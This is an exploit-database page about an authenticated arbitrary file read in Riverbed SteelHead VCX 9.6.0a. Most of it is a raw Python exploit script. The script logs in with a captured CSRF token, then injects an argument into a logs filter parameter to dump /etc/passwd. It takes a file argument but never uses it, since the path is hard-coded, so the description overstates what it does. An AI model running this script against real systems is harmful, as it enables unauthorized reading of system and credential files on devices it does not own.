header-logo
Suggest Exploit
vendor:
SteelHead VCX
by:
Gregory DRAPERI
7,5
CVSS
HIGH
Arbitry file reading
22
CWE
Product Name: SteelHead VCX
Affected Version From: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
Affected Version To: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
Patch Exists: YES
Related CWE: N/A
CPE: a:riverbed:steelhead_vcx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Arbitry file reading by authenticated users on Riverbed SteelHead VCX

An authenticated user can read arbitrary files on Riverbed SteelHead VCX. This exploit was discovered by Gregory DRAPERI in 2017. The vulnerable version is SteelHead VCX (VCX255U) (x86_64) 9.6.0a. The exploit uses a Session object to authenticate the user and then uses a GET request to read the arbitrary file.

Mitigation:

Ensure that the authentication process is secure and that the user is not able to access any arbitrary file.
Source

Exploit-DB raw data:

# Exploit title : Arbitry file reading by authenticated users on Riverbed SteelHead VCX
# Vendor: Riverbed
# Author: Gregory DRAPERI <gregory.draper_at_gmail.com>
# Date: 03/2017
# Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html
# Version: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
import sys
import requests


def exploit(address, login, password,file):
    s = requests.Session()
    url = address
    try:
        r1 = s.get(url+"/login?next=/");
        cookies = requests.utils.dict_from_cookiejar(s.cookies);
        csrf = cookies["csrftoken"]
        authentication = {'csrfmiddlewaretoken': csrf, '_fields': "{\"username\":\""+login+"\",\"password\":\""+password+"\",\"legalAccepted\":\"N/A\",\"userAgent\":\"\"}"}
        r2 = s.post(url+"/login?next=/",  data=authentication)
        r3 = s.get(url+"/modules/common/logs?filterStr=msg:-e .* /etc/passwd ")
        print r3.text

    except Exception as e:
        print "\n! ERROR: %s" % e
    return False



if len(sys.argv) < 4:
    print "Usage: exploit.py <target> <login> <password> <file>\n"
    print "Example: exploit.py http://192.168.1.2 admin password /etc/passwd\n"
    quit()
target = sys.argv[1]
login = sys.argv[2]
password = sys.argv[3]
file = sys.argv[4]
exploit(target,login,password,file)

Navigation

Suggest Exploit

Services By CQR